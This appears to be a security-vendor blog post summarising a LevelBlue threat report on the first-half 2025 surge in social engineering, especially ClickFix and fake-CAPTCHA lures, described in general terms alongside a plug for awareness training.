Cybersecurity incidents nearly tripled in the first half of 2025, jumping from 6% in the second half of 2024 to 17% in 2025, according to a new report from LevelBlue.
Business email compromise (BEC) remains the most common method for initial access, but non-BEC tactics rose by 214%. The researchers observed a major surge in social engineering attacks, driven by the recent popularity of the ClickFix tactic.
“The LevelBlue Threat Trends Report found a massive uptick in social engineering attacks, accounting for 39% of initial access incidents observed during the first half of the year,” the researchers write.
“This can be attributed to the increasing number of fake CAPTCHA social engineering attacks, especially ClickFix campaigns, which jumped 1,450% from the second half of 2024 to the first half of 2025. These attacks leverage user trust and urgency to easily gain access to organizations’ networks.”
ClickFix is a relatively new tactic that tricks users into running malicious commands on their computers.
“ClickFix lures users with fake system messages or alert pop-ups prompting them to ‘fix’ a purported issue by clicking a button or downloading a suspicious utility,” the researchers explain. “Fake CAPTCHA masquerades as a CAPTCHA verification page, prompting users to interact with keyboard input as part of a fake bot-detection challenge. These tactics create a false sense of legitimacy and cause the user to unintentionally execute attacker-controlled scripts.”
LevelBlue also warns that AI is increasing attackers’ efficiency and speeding up cyberattacks. New-school security awareness can provide an essential layer of defense against these incidents.
“What’s especially concerning is how fast attackers are moving,” the report says. “Breakout times are shrinking, and threat actors are moving laterally faster than ever. It’s a clear sign that attackers are getting more efficient — and more dangerous. This is why it’s critical for security teams to double down on cyber education and awareness training. If your training hasn’t covered the latest social engineering tricks, now’s the time to review and update it. At the end of the day, your people are still your first line of defense.”
KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
LevelBlue has the story.
Here's how it works:
